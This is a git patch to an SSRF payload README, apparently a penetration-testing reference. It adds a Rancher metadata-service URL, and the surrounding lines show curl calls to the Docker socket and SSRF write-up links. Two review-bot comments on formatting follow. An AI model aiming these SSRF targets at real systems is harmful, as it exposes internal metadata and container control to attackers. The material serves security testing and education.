From 78103d13a1edcc621b271bcae38dac176c806342 Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Mon, 8 Oct 2018 21:46:57 +0200 Subject: [PATCH] Add Rancher Metadata Service --- SSRF injection/README.md | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 17707b5..389c924 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -436,6 +436,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` +### SSRF URL for Rancher + +```powershell +curl http://rancher-metadata// +``` + +More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/ ## Thanks to @@ -451,4 +458,4 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) * [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) -* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) \ No newline at end of file +* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
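Review bot: In the added Rancher section, the command `curl http://rancher-metadata//` has an empty path segment between its two trailing slashes, which reads as a placeholder that got lost; spell out what belongs there, or drop the extra slash, so the line is usable as written. The fence is tagged `powershell` although the command is a plain curl call like the `bash-4.4#` examples just above it, so a shell tag (or none) would be accurate. The linked documentation is specific to Rancher v1.6, so the heading or a sentence under it should say which Rancher versions this hostname applies to and that it only resolves from inside a container on a Rancher-managed host. The bare "More info:" URL would also fit the file better as a `[title](url)` link, matching the entries in the reference list.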
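Review bot: The end-of-file newline fix on the last reference entry (the "Piercing the Veil" link) is unrelated to the commit subject "Add Rancher Metadata Service"; note it in the commit message or send it as a separate change so the history shows why that line was touched.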